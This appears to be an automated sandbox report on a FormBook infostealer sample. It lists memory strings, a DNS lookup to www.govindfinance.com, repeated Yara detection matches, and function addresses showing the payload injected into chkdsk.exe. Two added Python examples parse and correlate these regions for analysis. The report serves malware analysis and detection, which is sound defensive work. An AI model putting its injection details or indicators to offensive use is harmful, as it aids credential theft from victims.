Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown | DNS traffic detected: queries for: www.govindfinance.com

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2u2u8wnrrW.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
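The Yara match lists above (both the FormBook detection and the community-rule matches) name each region twice, once per rule, in two naming schemes: `<process>.<stage>.<image>.<base>.<n>[.raw].unpack` for carved PE images and `<process>.<stage>.<id>.<base>.<flags>.<flags>.sdmp` for raw memory dumps. The following is an added example, not part of the report, that parses both forms, deduplicates them and groups them by process, so the reader can see at a glance that the payload was matched in four processes and that every matched executable region carries the 0x40 flag. Assumptions: the fifth field of an `.sdmp` name is read as a Win32 page protection (0x40 being `PAGE_EXECUTE_READWRITE` and 0x04 `PAGE_READWRITE`), the sixth field is kept raw, and the process-index-to-image mapping is taken from this report's "Code function" lines (index 5 is not named in the excerpt).

```python
import re
from collections import defaultdict

# Constructed for this example: the match-source identifiers from the Yara
# lines of the report, each listed once.
MATCH_SOURCES = [
    "3.2.2u2u8wnrrW.exe.400000.0.unpack",
    "3.2.2u2u8wnrrW.exe.400000.0.raw.unpack",
    "0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack",
    "0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack",
    "00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp",
    "0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp",
    "00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp",
    "0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp",
    "00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp",
    "00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp",
    "00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp",
    "0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp",
    "00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp",
]

# Image per process index, taken from the report's "Code function" lines
# (0 and 3 are the sample, 11 is chkdsk.exe); index 5 is not named there.
PROCESS_NAMES = {0: "2u2u8wnrrW.exe", 3: "2u2u8wnrrW.exe", 11: "chkdsk.exe"}

# Assumption: field 5 of an .sdmp name is the Win32 page protection.
PROTECTION = {0x40: "PAGE_EXECUTE_READWRITE", 0x04: "PAGE_READWRITE"}

SDMP = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})"
                  r"\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$")
UNPACK = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9a-f]+)\.(\d+)(\.raw)?\.unpack$")


def parse_source(name):
    """Turn one match-source identifier into a region record, or None if unknown."""
    m = SDMP.match(name)
    if m:
        pid_idx, stage, _dump_id, base, prot, kind = m.groups()
        return {"process": int(pid_idx, 16), "stage": int(stage, 16),
                "base": int(base, 16), "protect": int(prot, 16),
                "kind": int(kind, 16), "form": "memory"}
    m = UNPACK.match(name)
    if m:
        pid_idx, stage, image, base, _n, raw = m.groups()
        return {"process": int(pid_idx), "stage": int(stage), "base": int(base, 16),
                "image": image, "form": "raw-unpack" if raw else "unpack"}
    return None


def regions_by_process(sources):
    """Group matched regions by process index, dropping duplicate (base, form) pairs."""
    out = defaultdict(dict)
    for name in sources:
        rec = parse_source(name)
        if rec is None:
            continue
        out[rec["process"]].setdefault((rec["base"], rec["form"]), rec)
    return {p: sorted(v.values(), key=lambda r: r["base"]) for p, v in out.items()}


def rwx_bases(sources):
    """Bases of matched memory regions whose protection is read/write/execute."""
    return sorted({r["base"] for regs in regions_by_process(sources).values()
                   for r in regs if r.get("protect") == 0x40})


if __name__ == "__main__":
    for proc, regs in sorted(regions_by_process(MATCH_SOURCES).items()):
        print(f"process {proc} ({PROCESS_NAMES.get(proc, '?')}):")
        for r in regs:
            prot = PROTECTION.get(r.get("protect"), "")
            print(f"  {r['form']:10s} base=0x{r['base']:08X} {prot}")
    print("RWX bases:", [hex(b) for b in rwx_bases(MATCH_SOURCES)])
```

Read together with the report's process tree, the grouping shows the same payload at 0x400000 in process 3 (the hollowed copy of the sample) and again at 0xAB0000 in process 11 (chkdsk.exe), both in RWX memory rather than in a file-backed image section; the two 0x04 regions are writable data, which is where an analyst would look for the decrypted configuration.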
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 0_2_019CCCCC
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 0_2_019CF090
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 0_2_019CF083
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_0040102D
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_00401030
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_0041B8D3
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_0041B8D6
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_0041C98B
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_0041C343
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_00408C8B
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_00408C90
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_00402D8C
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_00402D90
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_012C0D20
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_012E4120
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_012CF900
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01392D07
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01391D55
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_012F2581
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_012DD5E0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_012D841F
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01381002
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_012F20A0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_013920A8
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_012DB090
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01392B28
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_012FEBB0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01391FF1
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_0138DBD2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_012E6E30
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_013922AE
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01392EF7
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_05340D20
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_05411D55
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_05364120
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_0534F900
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_05412D07
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_05372581
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_0535D5E0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_0535841F
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_05401002
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_053720A0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_0535B090
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_054120A8
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_0537EBB0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_05411FF1
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_05366E30
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_05412EF7
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_00ACB8D6
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_00ACB8D3
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_00ACC98B
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_00ACC343
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_00AB8C8B
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_00AB8C90
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_00AB2D8C
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_00AB2D90
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_00AB2FB0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: String function: 0534B150 appears 35 times
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: String function: 012CB150 appears 35 times
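The function lists above for process 3 (the sample) and process 11 (chkdsk.exe) look unrelated until the addresses are compared by offset: `3_2_012C0D20` and `11_2_05340D20`, `3_2_0041B8D3` and `11_2_00ACB8D3` and so on differ by a constant per module. A relocated copy of the same code keeps every function at the same distance from its base, so finding a delta that explains many pairs at once is a cheap way to confirm that the code in chkdsk.exe is the payload from process 3, injected at a new base. The following is an added example, not part of the report, that parses the identifiers from the lines above (compacted into one string, constructed from the report) and searches for such shared deltas; the minimum support of 4 is an assumed threshold to suppress chance collisions.

```python
import re
from collections import Counter, defaultdict

# Constructed for this example: the "Code function" identifiers from the
# report's lines above, compacted into one block (process_stage_address).
REPORT_LINES = """
0_2_019CCCCC 0_2_019CF090 0_2_019CF083
3_2_0040102D 3_2_00401030 3_2_0041B8D3 3_2_0041B8D6 3_2_0041C98B 3_2_0041C343
3_2_00408C8B 3_2_00408C90 3_2_00402D8C 3_2_00402D90 3_2_00402FB0
3_2_012C0D20 3_2_012E4120 3_2_012CF900 3_2_01392D07 3_2_01391D55 3_2_012F2581
3_2_012DD5E0 3_2_012D841F 3_2_01381002 3_2_012F20A0 3_2_013920A8 3_2_012DB090
3_2_01392B28 3_2_012FEBB0 3_2_01391FF1 3_2_0138DBD2 3_2_012E6E30 3_2_013922AE 3_2_01392EF7
11_2_05340D20 11_2_05411D55 11_2_05364120 11_2_0534F900 11_2_05412D07 11_2_05372581
11_2_0535D5E0 11_2_0535841F 11_2_05401002 11_2_053720A0 11_2_0535B090 11_2_054120A8
11_2_0537EBB0 11_2_05411FF1 11_2_05366E30 11_2_05412EF7
11_2_00ACB8D6 11_2_00ACB8D3 11_2_00ACC98B 11_2_00ACC343 11_2_00AB8C8B 11_2_00AB8C90
11_2_00AB2D8C 11_2_00AB2D90 11_2_00AB2FB0
"""

FUNC_ID = re.compile(r"\b(\d+)_(\d+)_([0-9A-F]{8})\b")


def functions_by_process(text):
    """Map process index -> set of function start addresses found in the text."""
    out = defaultdict(set)
    for proc, _stage, addr in FUNC_ID.findall(text):
        out[int(proc)].add(int(addr, 16))
    return dict(out)


def shared_deltas(addrs_a, addrs_b, min_support=4):
    """Constant offsets d for which many a in addrs_a satisfy a + d in addrs_b.

    Relocated copies of one module share a single delta for every function;
    unrelated code only produces chance hits with tiny support. Returns
    (delta, support) pairs, strongest first. min_support=4 is an assumed
    threshold for this sample size.
    """
    b = set(addrs_b)
    support = Counter()
    for d in {y - x for x in addrs_a for y in addrs_b}:
        support[d] = sum(1 for x in addrs_a if x + d in b)
    return [(d, n) for d, n in support.most_common() if n >= min_support]


def matched_pairs(addrs_a, addrs_b, delta):
    """The (a, a + delta) pairs that one delta explains, sorted by address."""
    b = set(addrs_b)
    return sorted((x, x + delta) for x in addrs_a if x + delta in b)


if __name__ == "__main__":
    funcs = functions_by_process(REPORT_LINES)
    for delta, n in shared_deltas(funcs[3], funcs[11]):
        pairs = matched_pairs(funcs[3], funcs[11], delta)
        print(f"delta 0x{delta:08X}: {n} of {len(funcs[3])} functions in process 3 "
              f"reappear in process 11, e.g. 0x{pairs[0][0]:08X} -> 0x{pairs[0][1]:08X}")
```

Two deltas explain the whole of process 11: 0x04080000 maps sixteen of the nineteen functions from the 0x012C0000 region of process 3, and 0x006B0000 maps nine of the eleven functions from its 0x00400000 image onto the 0x00AB0000 region of chkdsk.exe. The report's "String function" lines give the same answer independently: 0x0534B150 minus 0x012CB150 is 0x04080000, and both are hit 35 times.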
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_004185F0 NtCreateFile
